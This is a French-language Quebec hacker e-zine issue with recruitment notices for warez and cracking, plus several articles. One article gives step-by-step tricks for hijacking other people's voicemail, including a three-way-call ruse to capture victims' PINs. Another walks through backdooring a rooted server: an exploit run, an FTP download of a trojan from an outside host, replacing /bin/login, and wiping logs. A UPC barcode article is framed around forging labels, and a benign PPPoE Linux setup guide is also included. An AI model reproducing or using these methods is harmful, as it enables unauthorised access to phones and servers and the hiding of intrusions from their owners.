Copy Link
Add to Bookmark
Report
iLLeGAL Granted Access Issue 15
.iLLeGAL Granted Access .... ## #
---------------------------- ## #
#########################################
> Quebec Monthly Ezine #15 #########################################
#########################################
---------------------------- #########################################
## #
BBS: igabbs.2y.net:23 ## #
####################
---------------------------- ##########################
##############################
Email: I_G_A@Hotmail.com #################################
######### ######
---------------------------- ####### ####
##### ###
Preface: ### ##
## #
Ce present texte pourrait ## #
contenir de l'information, ## # ##
vous en etes avertis! ### # ###
##### # ####
################### ########
Greet to: ################## ########
################
dreamday -Pour son support ############
moral.
##
Qha -Pour nous donnez ##
le gout de ne ##
jamais arreter. ######
## ######
Binf -Pour etre binf ## ######
#####
g463, -Pour apprendre :) ## #####
Bismuth, ## ######
Nitrogen ## ######
## #####
BurgerKing- Pour l'impression ## #######
du deja vu. ## ##############
## ##################
BudWeiser - Pour avoir assister ## #################
a la conception de ##################
ce ezine. #################
## ##################
XMMS - Pour l'ambience ## #################
###############
Et encore, dreamday pour son ###########
support moral. ######
##
## [Thanks to Unix Banner]
.------------------------------- ------------- ------- ----- -- -- - -
: Disclaim/Intro/[put your comment here] [00]
'------------------------------- ------------- ------- ----- -- -- - -
Salut tous, ca fesait bien longtemps que IGA n'avait
pas realiser un magazine pour le plaisir de le faire. Plusieurs fois
le magazine etait realiser pour seul but de satisfaire la demande, mais
maintenant, presentement SE SOIR, on l'ecrit pour le plaisir. Apres
tout, quelque bieres suffisent pour transformer une soiree de discution
platonique entre moi,qwyzkx,wyzeman en party son et lumiere :) Ou le sexe
par chance, n'est pas au rendez-vous (vous saissisez?:)) Se EZINE ne se
veut pas etre une reference mais plutot un packet de feuille a lire tout
confortablement assis sur le throne d'une toilette. Se EZINE ne fera pas
500 KO, on est pas des machines et se quon ecrit on prend quand meme le
temps dle checker. Mais comme pas mal de monde pense que la qualite
prime sur la quantite, IGA va sen sortir avec cette excuse :) Je tiens
aussi a noter que certains auront remarquer que plusieurs des articles
IGA de ce ezine ont une saveur + linuxienne qu'auparavant. Vous avez
raison :) Je n'ai rien dautre a ajouter... Sur cela bonne lecture.
wr:__2
.------------------------------- ----------- ------- ----- -- -- - -
: Public Request/Appel d'offre [01]
'------------------------------- ----------- ------- ----- -- -- - -
Afin que IGA puisse continuer sa trajectoire vers une destination non
etablis proche d'un endroit non precis, on aurait besoin de personnes
prettent a donner de leur sang pour une collecte qui aura lieu le...
jvous niaise :) On aurait plutot besoin de vous, oui vous. Presentement
IGA cherche quelques personnes/ressources pour combler certaines
perspectives du projet tout grandissant. voici donc les appel d'offre:
#iga-warez : on cherche des ftp et des fservs. msg Stryker ou Marvin si
vous etes interessez.
#iga-unix : nous recherchons des gens qui on une grande experience en
unix/bsd/linux et qui desire la partager dans un atmosphere
kewl et brancher :]. Si linux est votre dada, msg Wyzeman
ou Glaciuz et optenez ainsi access sur un chan de qualiter :]
#iga-coding : vous codez, vous desirez partager avec les autres codeurs
du IGA team. msg Wyzeman pour plus dinfo
Vous avez des Eggdrop, IGA en a besoin pour c'est channel, offrez nous
l'est :]
#IGA, nous avons fait lacquisition dun teach bot, vous pouvez ecrire des
cours :] (tout sujet permis, predilection : hacking/coding/electronique)
Web site iga : publiez si vos news, msg __2, stryker ou naxis pour plus
d'info
Ezine He oui, notre fameux ezine, envoyez vos article a __2 ou Wyzeman
nous sommes aussi a la recherche de personne billingue pret a traduire
IGA en anglais(cest fou hein!? Ben cest vrai)
Cracking : nouvelle section au sein de IGA, vous crackez des softs ?
msg Naxis pour vous joindre au IGA cracking team.
Bon je crois que les messages sont passees :)
.------------------------------------ ---------------- -------- -- -- - -
: Topic/Se retrouver dans le contenu/merci aux collabos [02]
'------------------------------------ ---------------- -------- -- -- - -
[01] Preface
[02] Appelle d'offre
[03] Les origniaux, ses chers petites betes
[04] WinNuke, la nouvelle terreur de l'ete
[05] Comment spoofer avec un wingate! oui oui ca se peut
[06] Lache ton boute
[07] Dave, jmen va te latter les couilles
[08] Article que personne ne lis jamais jamais
.------------------------------------------ ------------ ---- -- -- --
; tricks about *99 by nobody [01]
'------------------------------------------ ------------ ---- -- -- --
---- NOTE: IGA n'a pas pu retracer la personne qui nous a envoyez
cette article alors on est desoler de pas pouvoir mettre
de signature a la fin, la personne qui l'a ecrit, veuillez
nous contactez rapidement pour modifier cette injustice :)
Les excuses apparaitrons dans le MEA CULPA du #16.
Pour ceux qui ne le savent pas encors, c'est le numeros pour entrer dans sa
boite vocal. Bon asteur que toute le monde sait se qu'est *99, il a aussi
un numéros pour ecouter les messages a distance, qui est le xxx-6245.
Il ny a aucun password par default. Quand tu active ta boite vocal, la
premiere fois que tu vas dedans sa te demande un password. Donc sa veu
dir que on ne peu pas essayer les password par default... mais comment
cracker le password? Faut savoir que quand on n'est chez nous et on
entre dans la boite vocal sa demande aucun password. Pour avoir access
en dehors faut fair ses trois (3) premier numéros accompagner de 6245.
(Ex: 555-6245). Un fois que tu a appeler, ta suposer entendre une
bonne femme qui te demande le numéros de ta boite vocal (numéros de
téléphone), et ton password. Tu a trois (3) chance, quand tu essaye
un password pour la 3eme fois ... sa racroche. Donc meme essayer de
le cracker serais long en kâliss. Mais comment?
TRUC 1
Tres ... tres nieseu !!! Mais sa peu quand meme marcher a l'occasion.
Bon comme j'ai dit tento, quand on appelle au xxx-6245 ya la bonne
petite femme qui demande le numéros de la boite vocal et le password.
Donc, le but du truc est de fair que la victime elle meme entre son
password ... j'explique.Donc si vous appelez au xxx-6245 et que vous
faite une triple ligne avec la victime, quand elle vas repondre SI le
timing est bon, elle devrait entendre "Appuillez sur le carré et
entrer votre numéros de boite vocal". Si a les asser twit pour tapper
son numéros, a vas entendre
"Entrez votre mot de passe". Well, c tres stupide comme truc mais sa
peu marcher. Bon, steur comment le fair pour que toute marche, ou
plutot pour mettre plus de chance de votre coté. Premierement
arrenger vous pour enregistrer toute se que si passe sur votre
téléphone. Pourquoi? ben quand la victime vas entrer son password
vous aller entendre des bips hehe, donc vous pourrez jamais toute
les identifier d'un coup. Pratiquer vous a reconnaitre les bips qui
vas avec chaque numéros, et re-écouter votre enregistrement;)
Au pir, si vous ne découvrer pas toute le password, vous savez au
moin comment de numéros il prend ...
Quand tu appelle au xxx-6245, le commencement du message dit ceci:
1er - Appuilez sur le carré et entrez votre numéros de boite vocal.
Bon, quand tu ne tappe rien ... apres un boute sa te dit ceci:
2eme - Le carré est la touche en bat de ton téléphone blablabla
et le numéros de ta boite vocal est généralement ton
numéros de téléphone ... [en gros c'est sa;)]
PS: Chaque message passe du fois de suite, en francais et en anglais.
Genre le 1er passe en francais, ensuite en anglais. Le 2eme
passe en francais, ensuite en anglais. Je dit sa pour PAS que
personne penssE que les 2 messages passe en francais un apres
l'autre, et ensuite repasse en anglais.
Les temps:
Le temps entre le commencement du 1er message et la fin du 2eme: 48 secondes.
Le temps du premier message: 18 secondes.
Le temps du deuxieme message: 24 secondes.
A vous maintenant de déssider quelle message voulez vous que la victime
entende (1er ou 2eme).
Le temps des messages devrais vous aidez à calculer votre coup!
TRUC 2
Le password ne peu pas etre plus long que 7 numéros. 555-5555 ... hum
7 chiffres hehe! Ya pas de password par default, mais ya surment des
gens qui on seter leur password avec leur numéros de téléphone. Mais
bon, si vous voulez avoir un password en particulier sa aide pas!
Mais si vous voulez juste vous pognez des passwords de meme, ouvrez
votre livre de téléphone un samedi soir et let's go !!!
TRUC 3
Vous savez que quand tu active ta boite vocal, la premiere fois que tu
vas dedans sa te demande un password (et le nom pré-enregistrer). Bon a
meton que je laisse un message au 555-5555, une fois envoyer sa dit que le
message a été envoyer a Ti-Pierre (exemple). Le nom Ti-Pierre a été
enregistrer par la personne meme. Si la personne na jamais seter son
nom pré-enregistrer, quand on laisse un message sa nous dit selement
le numéros du gars. Se qui veu dir que aucun password ni nom pré-enregsitrer
n'a été seter. Le truc est le suivent: Si vous envoyer un message a quelqu'un
et à la place de dir son nom pré-enregistrer sa dit le numéros de téléphone,
sa veu dir que aucun password a été seter (ni nom pré-enregistrer). Bon a
metons vous avez trouvez quelqu'un qui na pas seter son password, appeler au
xxx-6245, entre le numéros de boite vocal.
C'est tu un password par default? Ou c'est carement un bug qui
prend nimporte quelle password? Je ne le sait pas, donc si sa vous arriver
comme password entrer simplement le numéros de téléphone.
Une fois se password entrer, vous ne serez pas encors dans la boite comme
telle. Il vas avoir un options pour changer le password et quelques autres.
Changez le password. Une fois fini, sortez ;)
J'ai cherche pendant un asti de boute pour un autre password non seter, pour
pouvoir donner plus de renseignement. Moi je pensse que c'est un bug ..
du cotée que le systeme vois que c'est la premiere fois
que t'essaye de entrer sur ta boite vocal, mais en réaliter tu n'est pas
chez vous. En tk ... a vous avez quand meme asser de renseignement pour
savoir comment détecter que la personne na pas seter de password, et comment
avoir access a la boite vocal.
-[ Ne jamais sous-estimer le pouvoir du pickle ]------ ---- --- -- - -
.------------------------------------------ ------------ ---- -- -- --
; Comment foncitonne les codes UPC [02]
'------------------------------------------ ------------ ---- -- -- --
Il etait une fois aux USA des epiceries qui se demandaient
comment elles pourraient bien automatiser tous leurs
caissieres d'une facon plus productive... C'est alors
que ces dernieres se dirent: mais pourquoi ne pas
inventer un code et faire lire les prix et les
descriptions des objets par un scanner? L'idee fut evi-
demment adoptee, mais ayant peur que les clients puissent
dechiffrer les codes et ainsi faire leurs propres etiquettes
pour "crosser" les scanners, ils deciderent de le faire suivant
un algorythme quand meme assez complexe... Mais, qui dit
encryption dit decryption et qui dit algorythme dit crack!
Laissez-moi donc vous expliquer comment fonctionne ce code...
Premierement, il existe 2 sortes de codes UPC, un a 13 (Europe)
et un a 12 chiffres (Amerique). Habitant au Canada, je vais donc
m'attarder a celui a 12 chiffres.
Avant d'analyser, il faut comprendre ce que representent les barres:
et bien, c'est simple. Un espace en noir veut dire "1" et un espace
en blanc veut dire "0" en binaire...
Par exemple,
" " serait: 1001101, soit 77.(mais sur un vrai code, les deux symboles sont parfaitement
collés ensemble, il est donc desfois difficile de savoir
combien il y en a... dans ce cas, se fier a la largeur
de la bande.)
Ensuite, voyons comment fonctionnent les chiffres:
Premierement, ce code est divisé en 4 parties qui forment les 12
chiffres, soit:
- Le signal qui annonce le debut -
*Le premier chiffre
*Les 5 suivants
- La barre separatrice -
*Les 5 suivants
*Le dernier chiffre
- Le signal qui annonce la fin -
Alors jusqu'ici, ce serait simple...juste a mettre les valeurs
de chaque chiffre du code en binaire et ensuite mettre les
barres qui correspondent... mais ce serait trop facile...
Ils ont donc fait une table pour associer chaque chiffre
a un autre chiffre de 1 a 128 qui se divisent en 3 colonnes
comme suit:
CODE A CODE B (XOR C) CODE C (NOT A)
Binaire Decimal Binaire Decimal Binaire Decimal
0: 0001101 (13) 0100111 (39) 1110010 (114)
1: 0011001 (25) 0110011 (51) 1100110 (102)
2: 0010011 (19) 0011011 (27) 1101100 (108)
3: 0111101 (61) 0100001 (33) 1000010 (066)
4: 0100011 (35) 0011101 (29) 1011100 (092)
5: 0110001 (49) 0111001 (57) 1001110 (078)
6: 0101111 (47) 0000101 (05) 1010000 (080)
7: 0111011 (59) 0010001 (17) 1000100 (068)
8: 0110111 (55) 0001001 (09) 1001000 (072)
9: 0001011 (11) 0010111 (23) 1110100 (116)
Le code du debut: 101
Le code du centre: 01010
Le code de la fin: 101
Evidemment, encore une fois, ce serait simple..
Juste à suivre les tables et associer les chiffres aux
valeurs de ces dernieres et le tour est joué! Mais bon,
il fallait bien qu'il complique ca un petit peu! La
deuxieme moitié des chiffres (7 a 12 inc.) utilisent toujours
la colonne C. Par exemple, si le 7ieme chiffre est "8", il
vaudra donc "1001000" pour le scanner, soit 72. Jusque la,
rien de bien compliqué. Mais le hic, c'est que pour les
6 premiers chiffres, au lieu de suivre une colonne bien précise,
CHAQUE chiffre suit une colonne différente (soit la A ou la B).
Comment faire pour savoir ca ? La clé se trouve dans le tout
premier chiffre du code UPC, qui indique quelles seront les
colonnes a suivre pour les 6 premiers chiffres, en suivait
la table que voici:
#1 #2 #3 #4 #5 #6
0 A A A A A A
1 A A B A B B
2 A A B B A B
3 A A B B B A
4 A B A A B B
5 A B B A A B
6 A B B B A A
7 A B A B A B
8 A B A B B A
9 A B B A B A
Pas trop compliqué dans le fond...
Par exemple, si le premier chiffre du code UPC est "5"...
Alors le pattern a suivre pour les 6 premiers sera:
"ABBAAB", ce qui veut dire que le premier chiffre
suivra le pattern A, le deuxieme le pattern B, et ainsi
de suite...
C'est donc dire que si le code est:
293847192055 par exemple, le premier chiffre
est "2", donc, les 6 premiers chiffres suivront le 2e
pattern et les 6 derniers suivront le pattern C.
soit:
code upc: 2 9 3 8 4 7 1 9 2 0 5 5
pattern: A A B B A B C C C C C C
valeur(dec): 009 011 033 009 035 017 102 116 108 114 078 078
*** Ne pas oublier que dans le code il y a le code de
commencement (101), celui du milieu qui est plus long
que les autres lignes (01010) et celui de la fin (101)
*** Ce code UPC est evidemment un faux tiré au hasard...
Voila!
Mais encore une fois, c'est quand meme assez simple si on
connait les tables... Alors ils ont rajouté la touche ultime
qui fait que c'est difficile d'inventer des codes:
le "checksum security number", soit le chiffre de securité.
Voici comment il marche: premierement, ce chiffre est le dernier.
Il doit correspondre a un total d'une operation bien precise
Voici l'operation:
a) Faire le total de tous les chiffres pairs du code UPC
(ne pas oublier que le premier chiffre correspond au
chiffre #0)
b) Faire le total de tous les chiffres impairs du code UPC
et le multiplier par 3.
c) Additionner a et b
d) Modulo de c
e) si (modulo n'est pas egal a zero) donc reponse =
10 - d
en mathematiques:
10 - ( mod ( Sum(even) + Sum(odd) * 3 ) )
si d == 0 donc enlever le "10-" devant...
Voila comment marche ce fameux code!
- Sirdave
-[ Le golf c'est passionant, lalalallalalalalal ]------ ---- --- -- - -
.------------------------------------------ ------------ ---- -- -- --
; Comment bakcdoorer les box que tu root aka un trou stun trou
: [03]
'------------------------------------------ ------------ ---- -- -- --
by bismuth, aka Le gars qui fait son lavage
Hum...
bon ok, on va supposer que vous savez comment rooter une box, parce que
sinon ce texte s'adresse pas a vous. On va aussi supposer que vous
venez pas de QHA, que vous avez pas 15 ans, que votre nick commence pas
par Du pis fini pas par k3st4r. On va supposer finalement que vous êtes
un humanoïde doté d'au moins 40 de QI (donc que vous arrivez pas de sur
#ados [hum chu op la-bas moi..], ayant des organes reproductifs et un
systeme digestif fonctionnel.. bin quoi.. faut assurer la survie des
leet hax0rz..).
J'me fou d'la façon que vous le faites, j'me fou du temps que vous
prenez.. chui pas ici pour critiquer votre façon, non je ne parlais
pas de ce que vous faites le soir en pensant à un acteur quelquonque
acteur j'parlais de rooter la box. Bon... ce qui est bien avec cke
jvous propose aujourd'hui, c'est qu'une autre chose dont j'vais me foutre
dans cet article est... la plate forme de la box que vous avez hacké,
oui oui la plateforme on s'en fou.
On va commencer par se demander pourquoi un leet h4x0r comme toi
voudrait backdoorer une box qu'il a hacké. Il est évident que si vous
avez réussi a la rooter, c'est parce que la sécurité était vraiment
mais vraiment nulle(prenez ca personnel). Donc vous pourrez vous
resservir de votre exploit ou encore de peu importe la façon que vous
auriez pu rooter la box pour y retourner. Il y a de multiples
avantages à la backdoorer par example:
- Si par un malencontreux hasard l'admin venait à découvrir qu'il est
vulnérable, il va fixer sa faille et vous ne pourrez plus accéder à
la box.
- Il n'y a pas de variables d'environnement quand vous vous servez du
rootshell de l'exploit.
- Avec la backdoor, tu vois ce que tu fais, et c'est pas mi-aveugle
(comme je vais le mentionner ci-bas .. pour le ftp) pour la plupart
des commandes que tu fais.
- Le plus gros avantage je trouve est la disponibilité de la box par
après, je m'explique. Je suis au cegep, j'ai besoin de la box pour
une raison quelquonque. Vous allez avoir besoin d'une plate linux
quelquonque pour runner l'exploit et vous logger sur la box. Pas
nécessairement me direz-vous, parce que vous pouvez toujours vous
connecter en telnet chez vous et runner l'exploit de chez vous. Mais
il y à quatre principales raisons pourquoi ca ce n'est pas bon :
1- Pourquoi ne pas avoir un surplus de sécurité en vous
connectant directement sur la box a partir de l'école plutot
que de mettre votre propre connection à découvert?
2- Si vous vous faites déconnecter pour une raison X à la
maison vous êtes cuits.
3- La vitesse de connection est toujours plus grande quand
vous ne passez pas par une gate (votre ordinateur personnel
dans ce cas-ci)
4- L'admin vous retrace, remonte jusqu'à votre ip à la
maison, envoie la GRC qui arrive 2 semaines plus tard, vous
avez déménagé parce que vous êtes leet et que vous savez que
vous vous êtes fait pogner. Mais vu que vous êtes dans QHA
votre leet crew vous stoule pour se décriminer d'avoir
utilisé la box eux aussi. Donc vous mangerez des marshmallows
en écoutant Bouscotte le mardi soir à place de chatter avec
vos copains d'IRC. On apprend par la suite que QHA est
démantelé parce qu'ils ont pu de supreme leader.
Je vous explique ma petite histoire. Étant pas coder pour 2 cennes,
j'ai mis mon déguisement de script kiddie pour trouver une bonne
backdoor. Malheureusement les rootkits sont différents pour chaque
plate-forme... et puis il y en avait pas pour toutes justement. Bon
revenons aux faits... je cherchais une bonne backdoor, c'est
alors que je suis allé sur un site quelquonque.. sûrement
http://packetstorm.securify.com. Je cherchais et cherchais depuis des
heures et des heures intensives (faut dire aussi que je chattais, je
mangeais, je codais un TP en c++, un TP en asm et que je parlais au
téléphone et avec mon coloc, que j'écoutais km/h, que je lisais un
e-zine et que je me promenais sur la box que je venais de rooter),
quand finalement, j'ai trouvé mon petit code source miracle, un
trojan universel.
Alors je le compile sur ma box, ca marche, je le compile sur la box
SCO UNIX (#iga-unix ... SUBTIL) que javais rooté dans l'heure
précédant mes multiples heures de recherche intensive.... ca marche aussi.
Bon.. je l'ai installé seulement sur la box que javais rooté (par
soucis de sécurité personelle peut-être? :P)... je suis les
instructions... assez compliquées hehe. The final test... je me log sur
la box en windows, avec CRT parce que le telnet de windows est trop lent.
Bon maintenant, pour vous, petits visuels que vous êtes, je vais vous
montrer la méthode pas-à-pas ...
P.S. Par soucis d'espace, j'ai pas eu droit aux screenshots, fak va
falloir se contenter des ascii.
1. XMMS avec la toune Sleepers de Atomic, c'est la toune de trainspotting
2. un 2 litre de Dr. Pepper
3. Quest for the Holy Graal, de Monthy Python.
4. la voisine de l'appartement d'en face (piles non comprises)
7. Allons-y.
Ceci est un Eterm transparent incrusté dans le
background vert et noir, dans Windowmaker,
Sous Slack7, kernel 2.2.13, sur un P200 MMX avec 32mb de ram
|-----------------------------------------------------------------------|
|dunnoh:~$ ./exploit 208.218.3.1 ----> I wonder what this is..
|^v^v^v^v^v^v^v^v^v^v^v.... ----> bon on a le root
|cd tmp
|ftp zippy.shellyeah.org ----> un ftp quelquonque
|Linuxqc ----> le tout se fait aveuglément :P
|AreL33t ----> OMFG on voit mon pass
|
|get utrojan.c
|bye
|
|cc -o login utrojan.c
|rm utrojan.c
|mv /bin/login /bin/.login
|mv login /bin/login
|^C
|dunnoh:~$
|-----------------------------------------------------------------------|
Assez compliqué hein...
On va passer à la section TroubleShooting
Ceci est un RxvT noir, sur un
Background blanc, dans FVWM2
Sous Slack4, kernel 2.0.36
|-----------------------------------------------------------------------|
|cc -o login utrojan.c
|cc: command not found
|gcc -o login utrojan.c
|gcc: command not found
|oh calisse chu dans marde
|oh calisse chu dans marde: command not found
|^C
|bash-2.03$
|-----------------------------------------------------------------------|
Bon dans ce cas la...
moi ce que j'ai fait quand ca m'est arrivé... tu prend un binary que tas
déja compilé sur une box DE LA MEME PLATEFORME Déja que c'est risqué de
faire ca, va pas le prendre un binary d'une autre plateforme. Pis non
jva pas expliquer comment aller chercher le binary. Si jamais vous
trouvez pas de box avec cc ni gcc d'installé... msg moi ca se peut que
j'aie le binary qu'il vous faut.. mais essayez vous avant.
Ceci est un XTerm blanc, sur un background
de photo du chien de la famille, dans KDE
Sous Redhat 6.2, kernel 2.2.14, sur un
PIII 500mhz, avec 128mb de ram
|-----------------------------------------------------------------------|
|dunnoh:~$ bon mettons que vous avez backdooré votre box
|bon mettons que vous avez backdooré vot box: command not found
|dunnoh:~$ telnet 208.218.3.1
|Trying 208.218.3.1...
|Connected to 212.205.76.156.
|Escape character is '^]'.
|
|SCO OPenServer(TM) Release 5 (walt.disney.com) (ttyp0)
|
|Connection closed by foreign host.
|dunnoh:~$
|-----------------------------------------------------------------------|
Si vous obtenez ca... vous avez cassé le login
Ca m'est arrivé un soir ou j'étais très fatigué, connecté avec un 56k
dans la chambre chez mon père. J'ai malencontreusement effacé le
/bin/login au lieu de le renamer en /bin/.loginj'ai eu l'air cave...
si jpeux vous donner un conseil, allez dans /var/adm pis effacez donc tous
les logs, pis touchez pu jamais à cte box la... sauf si vous vous sentez
d'attaque pour l'arranger... cke jme sentais pas cte soir la... hehe
End of troubleshooting...
Finalement, en gros, cke ca devrait vous donner une fois fini, c'est
quelquechose comme ca :
Ceci est la CONSOLE, parce que si
J'avais pas mis la console, les lecteurs
elites de IGA (ie QHA and #linuxqc) me
feraient gunner.
|-----------------------------------------------------------------------|
|dunnoh:~$ telnet 208.218.3.1
|Trying 208.218.3.1...
|Connected to 212.205.76.156.
|Escape character is '^]'.
|door
|SCO OPenServer(TM) Release 5 (walt.disney.com) (ttyp0)
|
|door
|# Le voici enfin ce petit # tant recherché!
|# Le voici enfin ce petit # tant recherché!: not found
|# exit
|Connection closed by foreign host.
|dunnoh:~$
|-----------------------------------------------------------------------|
Bon yé 3h am... jsuis mieux daller me coucher avant de ne pas pouvoir
résister à la toune de Dragon Ball Z.
Je vous ai donné le code... ca s'appelle utrojan.c
Je l'ai modifié un peu pour le protéger des VRAIS script kiddies,
vous savez.. ceux qui laissent tomber si le code qu'ils ont downloadé
marche pas. Si vous trouvez pas le problème dans le code, vous viendrez
faire ma vaisselle j'vous expliquerai quelques rudiments :P
Si vous avez des commentaires... suggestions... menaces de mort
emailez-moi à bismuth@the-pentagon.com
Ah pis... je suis pas un hacker.
EOT
-bismuth
wyze : le code est disponible sur le bbs (comme toute les autre cossin
qui accompagne les ezine iga)
-[ qwzyxk est tout sauf une source d'inspiration ]------ ---- --- -- - -
---------------------------------------------------------------------------
[004] HSE on Linux Howto & tricks [__2]
---------------------------------------------------------------------------
Cette article est ecrit pour eclaircir certaine
personne sur le cas (HSE on Linux) qui pour certains est assez nebuleux.
Moi-meme j'avais deja entendu que le HSE spa comme le modemcable, cest un
chiard sous linux, il n'y a fallu que quelques secondes pour que je
decouvre que c'etait tout a fait faux. A certains points de vue le HSE
apporte bcoup d'avantage, expressement sur Linux. On va aussi aborder le
sujet des tours de carte, c'est a dire des choses qu'on peut faire avec
un HSE tout specialement sur Linux. Tout dabord eclaircisont se qu'est un
modem HSE. HSE tiens pour High Speed Edition, en fait c'est un service
de Sympatico, sous compagnie de Bell Canada (Fournisseur internet quoi).
S'appuyant sur la technologie PPPoE(Point per point over Ethernet). Par
defaut le service roule chez le client en passant par un modem NorTel et
ce qui est interessant c'est que ca passe par a ligne (xDSL)mais que cela
n'occupe pas la ligne en cours.On peut donc en deduire que certain autres
ISP offrant le xDSL pourraient sans nul doute se configurer de la meme
facon. Donc cette article n'est pas "exclusivement" reserver au service
HSE.Ceux qui ont une connection qui se base sur la technologie Modemcable
qui passe par cable TV, oubliez ca tout de suite :)
On va aborder maintenant le sujet de la configuration sous Linux, pour ma
part j'ai utiliser Slackware 7 e t REDHAT 6.1. C'est certain que ca
fonctionne aussi, sauf dans les OS un peu depasser. Voici un site qui va
a coup sure pouvoir vous aidez.
www.sympaticousers.org, il sagit dun site qui non-officiel de sympatico.
Vous devez vous assurez pour continuer que vous avez au moins une carte
Ethernet fonctionnelle.Avec un access ROOT tapez ifconfig dans la console.
Vous devriez voir quelque chose comme ca:
eth0 Link encap:Ethernet HWaddr 00:E0:98:70:52:E2
inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5683 errors:0 dropped:0 overruns:0 frame:0
TX packets:8630 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
Interrupt:3 Base address:0x300
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:3924 Metric:1
RX packets:214 errors:0 dropped:0 overruns:0 frame:0
TX packets:214 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
a gauche c'est les devices virtuels ou physiques. Ici eth0 est la premiere
carte reseau. Ca peut etre eth1,2,3,4,5 ca pas d'importance. tant que vous
avez un eth0. lo est un hardware virtuel. Il veut dire loopback. Il s'agit
toujours du host localhost/127.0.0.1. Mais il n'est d'aucune importance
dans cette article. Si vous regardez profondement vous verrez que eth0 a
comme IP: 192.168.0.100. Ca peut etre nimporte quoi. C'est votre IP de LAN
(Local Area Network).Si vous avez donc un device ETHx vous pouvez continuer
a lire. Maintenant allez vous cherchez un bon gestionnaire de connection
pour Linux. Le meilleur est a mon avis: rp-pppoe trouvable a :
http://www.roaringpenguin.com/pppoe.html
Prenez le fichier .tar.gz et non pas le fichier .rpm, ici il faut comprendre
comment ca fonctionne :) Apres l'avoir telecharger, extracter le:
Tar xfvz rp-pppoe*.tar.gz
Allez dans le repertoire creer, vous devez voir ceci:
slint:~/rp-pppoe-1.7# ls
HOW-TO-CONNECT adsl-setup.8 configure pppoe.8
LICENSE adsl-setup.in configure.in pppoe.c
Makefile.in adsl-start.8 firewall pppoe.conf
PROBLEMS adsl-start.in firewall-masq pppoe.conf.5
README adsl-state.pl firewall-standalone pppoe.h
adsl-connect.8 adsl-stop.8 go spec
adsl-connect.in adsl-stop.in install-sh
adsl-init.in config.h.in pap-secrets
slint:~/rp-pppoe-1.7#
Aucune compilation n'est necessaire, ne faite que lancer ./go
et suivez les etapes:
-----------------------------------------------------------------------
creating cache ./config.cache
checking for gcc... gcc
checking whether the C compiler (gcc ) works... yes
checking whether the C compiler (gcc ) is a cross-compiler... no
checking whether we are using GNU C... yes
checking whether gcc accepts -g... yes
checking how to run the C preprocessor... gcc -E
checking for ANSI C header files... yes
checking for sys/wait.h that is POSIX.1 compatible... yes
checking for fcntl.h... yes
checking for sys/ioctl.h... yes
checking for sys/time.h... yes
checking for syslog.h... yes
...
apres keke compilation... ca donne ceci:
Welcome to the Roaring Penguin ADSL client setup. First, I will run
some checks on your system to make sure the PPPoE client is installed
properly...
Looks good! Now, please enter some information:
USER NAME
Enter your PPPoE user name (default bxxxxxxx@sympatico.ca):
(* ICI Allez ramassez votre feuille HSE et tapez votre account@sympatico.ca *)
INTERFACE
Enter the Ethernet interface connected to the ADSL modem
(default eth0):
(*Eth0 ou nimporte lequel autre(voir IFCONFIG) *)
Please enter the IP address of your ISP's primary DNS server.
If you just press enter, I will assume you know what you are
doing and not modify your DNS setup.
Enter the address here:
(*Entrer votre premier DNS: 204.101.251.1 *)
Please enter the IP address of your ISP's secondary DNS server.
If you just press enter, I will assume there is only one DNS server.
Enter the address here:
(*Entrer votre deuxieme DNS: 204.101.251.2 *)
PASSWORD
Please enter your PPPoE password:
(* C'est plutot Explicite :) *)
Please choose the firewall rules to use. Note that these rules are
very basic. You are strongly encouraged to use a more sophisticated
firewall setup; however, these will provide basic security. If you
are running any servers on your machine, you must choose 'NONE' and
set up firewalling yourself. Otherwise, the firewall rules will deny
access to all standard servers like Web, e-mail, ftp, etc.
The firewall choices are:
0 - NONE: This script will not set any firewall rules. You are responsible
for ensuring the security of your machine. You are STRONGLY
recommended to use some kind of firewall rules.
1 - STANDALONE: Appropriate for a basic stand-alone web-surfing workstation
2 - MASQUERADE: Appropriate for a machine acting as an Internet gateway
for a LAN
Your choice?
(* Ici vous avez 3 choix (NONE/STANDALONE/MASQUERADE) *)
(* NONE ne change rien dans vos settings (IPCHAINS And co) *)
(* STANDALONE fout un firewall qui n'accepte rien en bas de 1024(port) *)
(* MASQUERADE Permet de service de gateway. Si vous avez un 2-eme ordi *)
(* dans le LAN vous pouvez lui specifier cette ordi comme GATEWAY, *)
(* apres avoir mis les 2 DNS manuellement vous pourrez aller sur *)
(* internet. *)
-----------------------------------------------------------------------
Maintenant vous pouvez partir la connection avec adsl-start. Apres avoir
ete lancer il vous retourne au prompt, maintenant retaper ifconfig et vous
devriez voir dequoi comme ceci.
eth0 Link encap:Ethernet HWaddr 00:E0:98:70:52:E2
inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8985 errors:0 dropped:0 overruns:0 frame:0
TX packets:13652 errors:0 dropped:0 overruns:0 carrier:0
collisions:2 txqueuelen:100
Interrupt:3 Base address:0x300
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:3924 Metric:1
RX packets:214 errors:0 dropped:0 overruns:0 frame:0
TX packets:214 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
ppp0 Link encap:Point-to-Point Protocol
inet addr:216.209.253.130 P-t-P:216.209.253.1 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1492 Metric:1
RX packets:8271 errors:0 dropped:0 overruns:0 frame:0
TX packets:13098 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10
Noter le ppp0, il s'agit dun hardware reseau virtuel linker au eth0 qui
represente votre connection internet. Votre IP dans se cas-ci est
216.209.253.130, taper ping www.yahoo.com -c 5 pour verifier si cela
fonctionne:
PING www.yahoo.akadns.net (216.32.74.52): 56 data bytes
64 bytes from 216.32.74.52: icmp_seq=0 ttl=242 time=101.3 ms
64 bytes from 216.32.74.52: icmp_seq=1 ttl=242 time=105.8 ms
64 bytes from 216.32.74.52: icmp_seq=2 ttl=242 time=98.8 ms
64 bytes from 216.32.74.52: icmp_seq=3 ttl=242 time=103.6 ms
64 bytes from 216.32.74.52: icmp_seq=4 ttl=242 time=102.3 ms
